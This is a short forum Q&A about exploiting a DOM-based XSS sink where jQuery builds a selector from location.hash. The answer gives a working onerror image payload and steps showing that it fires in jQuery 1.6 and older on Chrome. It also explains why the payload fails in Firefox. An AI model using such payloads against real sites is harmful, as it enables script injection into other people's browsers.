Hash sign wrecking my XSS payload. How to exploit?

I came across to this code snippet, I wonder if anybody knows how to bypass the # sign that make my payload syntax problematic and write a successful XSS payload for this case.

var hashvalue = window.location.hash.substring(1);
var i = $(’#’ + hashvalue);

when I use something like www.example.com/index.html#alert(1234); i value becomes #alert(1234) and payload doesn’t work. Any suggestion will be appreciated.

Thanks in advance

Yes, it’s exploitable on Chrome (and Edge/IE I think, not Firefox) when using jQuery version <=1.6 (unpatched 1.6)


  1. Go to any URL that does not use jQuery and append #<img/src='kungenosilvia'/onerror=javascript:alert(1)>

  2. Open developer tools (f12) and type:

    s = document.createElement(“script”);
    s.type = “application/javascript”;
    (document.getElementsByTagName(“head”)[0] || document.documentElement).appendChild(s);

Finally, execute: $(location.hash);

Note, it doesn’t work in Firefox because location.hash returns < and > percent-encoded.